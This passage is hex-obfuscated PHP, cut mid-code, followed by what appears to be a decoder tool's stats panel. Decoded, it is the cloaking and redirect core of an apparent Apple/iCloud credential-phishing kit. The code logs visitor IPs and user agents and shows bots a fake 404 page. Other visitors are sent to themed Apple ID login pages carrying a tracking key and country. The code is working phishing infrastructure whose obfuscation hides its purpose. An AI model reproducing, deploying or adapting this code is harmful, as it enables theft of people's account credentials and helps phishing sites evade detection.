\x41cti\x76e)"."\n");fclose(${${"G\x4c\x4fBAL\x53"}["\x79\x6b\x63\x73\x6bptx\x70tor"]});header("\x48T\x54P/1.0\x20\x34\x30\x34\x20Not Found");die("<\x21\x44OC\x54\x59PE H\x54M\x4c PUBLIC \x22-//\x49\x45TF//\x44\x54\x44\x20\x48\x54M\x4c \x32\x2e0//\x45\x4e\"\x3e\x3cht\x6dl\x3e\x3che\x61\x64\x3e\x3c\x74itl\x65\x3e404 \x4e\x6f\x74 \x46\x6fund\x3c/\x74\x69tle></he\x61d\x3e\x3cbod\x79\x3e<h1\x3e\x4e\x6ft \x46o\x75nd\x3c/\x681\x3e\x3cp>\x54he \x72\x65qu\x65st\x65\x64\x20\x55\x52\x4c\x20\x77\x61s \x6e\x6ft \x66\x6fu\x6e\x64\x20o\x6e\x20\x74h\x69s\x20se\x72v\x65\x72.</\x70\x3e<p>\x41ddit\x69o\x6ea\x6cly,\x20a \x340\x34\x20\x4eot\x20\x46o\x75\x6ed\x20\x65rror \x77a\x73 \x65ncou\x6ete\x72\x65d\x20whil\x65 \x74ryi\x6e\x67\x20\x74\x6f \x75se \x61\x6e\x20\x45r\x72orD\x6f\x63\x75m\x65n\x74 t\x6f han\x64l\x65\x20th\x65 r\x65\x71u\x65\x73t.</p\x3e</bod\x79></\x68\x74\x6dl>");}}if(${${"G\x4c\x4fB\x41\x4c\x53"}["la\x6d\x78\x74\x67\x62\x6bo"]}["th\x65me"]=="a\x70p\x6ce"){${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x6b\x67\x72\x6dt\x70\x68\x61\x71\x74d"]="\x63\x69\x64";echo"\x3c\x73\x63r\x69\x70t t\x79\x70\x65\x3d't\x65\x78t/\x6a\x61\x76a\x73\x63r\x69pt\x27>w\x69ndo\x77.t\x6fp.\x6co\x63\x61\x74\x69o\x6e\x3d'se\x73s\x69\x6fn/?\x76\x69\x65w=l\x6f\x67\x69n\x26a\x70pI\x64K\x65y\x3d".${${"G\x4c\x4f\x42\x41L\x53"}["\x66\x77\x75c\x6d\x75\x78\x70\x6e"]}."&\x63o\x75n\x74ry=".${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x6bg\x72m\x74\x70h\x61\x71td"]}."\x27\x3b\x3c/s\x63r\x69\x70t>";}else if(${${"\x47\x4cO\x42\x41\x4c\x53"}["l\x78\x69\x73\x6ao\x77\x64n\x72"]}["\x74\x68e\x6de"]=="\x69\x63\x6c\x6f\x75d"){echo"\x3c\x73c\x72\x69\x70t \x74y\x70\x65='\x74ext/ja\x76a\x73c\x72\x69\x70t'>w\x69\x6e\x64\x6f\x77.t\x6fp.\x6co\x63at\x69o\x6e\x3d'se\x73\x73i\x6fn/?v\x69\x65w=\x69\x63l\x6fud&\x61ppIdK\x65y=".${${"G\x4c\x4fB\x41\x4c\x53"}["\x66\x77u\x63m\x75\x78\x70\x6e"]}."\x26c\x6f\x75\x6e\x74ry=".${${"\x47\x4c\x4f\x42\x41L\x53"}["\x76\x73\x74\x6a\x6b\x6e"]}."'\x3b</s\x63ri\x70t\x3e";}else{${"\x47\x4c\x4fB\x41\x4c\x53"}["l\x75\x6d\x6ay\x63m\x75"]="cid";echo"<s\x63r\x69pt\x20t\x79\x70e=\x27\x74ext/ja\x76\x61\x73\x63\x72i\x70t'>\x77i\x6e\x64\x6f\x77.\x74o\x70.lo\x63a\x74i\x6f\x6e\x3d'\x73es\x73i\x6fn/?view=\x63las\x73\x69\x63&\x61\x70p\x49dKey\x3d".${${"GL\x4fB\x41\x4cS"}["\x66w\x75\x63\x6d\x75\x78\x70n"]}."\x26\x63\x6f\x75nt\x72\x79=".${${"G\x4c\x4f\x42A\x4cS"}["\x6c\x75\x6d\x6a\x79\x63m\x75"]}."\x27;</\x73\x63r\x69pt\x3e";}}}else{${${"GL\x4fB\x41\x4cS"}["y\x6bc\x73\x6b\x70\x74\x78\x70\x74\x6fr"]}=fopen("l\x6f\x67\x73/\x74otal_bo\x74.txt","a");$sfquun="\x63l\x69\x63k";fwrite(${${"G\x4cO\x42A\x4cS"}["\x79\x6b\x63s\x6b\x70\x74xp\x74\x6f\x72"]},"$ip\x20- $ua (\x44\x65\x74\x65ct W\x69\x74\x68\x6fu\x74\x20P\x61ra\x6d\x65t\x65\x72"."\n");fclose(${$sfquun});header("H\x54TP/\x31\x2e0\x20\x340\x34 \x4eot \x46\x6fu\x6ed");die("<!\x44\x4f\x43\x54\x59PE H\x54\x4d\x4c\x20\x50U\x42LI\x43 \x22-//I\x45\x54F//D\x54D H\x54\x4d\x4c\x202\x2e\x30//\x45\x4e\x22><\x68tm\x6c>\x3c\x68\x65\x61d>\x3c\x74\x69t\x6c\x65>4\x30\x34 N\x6f\x74\x20Fo\x75\x6ed</t\x69t\x6ce>\x3c/\x68\x65ad\x3e<\x62\x6fd\x79>\x3ch1\x3e\x4e\x6f\x74 Fo\x75\x6e\x64</\x681\x3e\x3c\x70\x3e\x54\x68e\x20r\x65qu\x65s\x74\x65d UR\x4c\x20\x77\x61s\x20n\x6f\x74\x20fo\x75\x6e\x64 \x6fn th\x69s\x20s\x65r\x76\x65r\x2e</p><\x70>Additi\x6fn\x61l\x6cy,\x20a 4\x30\x34 N\x6f\x74 \x46o\x75\x6ed\x20\x65rror \x77a\x73 \x65n\x63ou\x6etere\x64\x20\x77\x68\x69\x6ce \x74r\x79\x69ng \x74o use an Error\x44\x6f\x63\x75ment to \x68andl\x65 \x74h\x65\x20\x72e\x71\x75est\x2e</p></\x62\x6f\x64y></\x68t\x6d\x6c\x3e");}}
?>

Function Calls

None

Variables

None

Stats

MD5 7aeedda2643da253a2c605ec6b8e716f
Eval Count 0
Decode Time 182 ms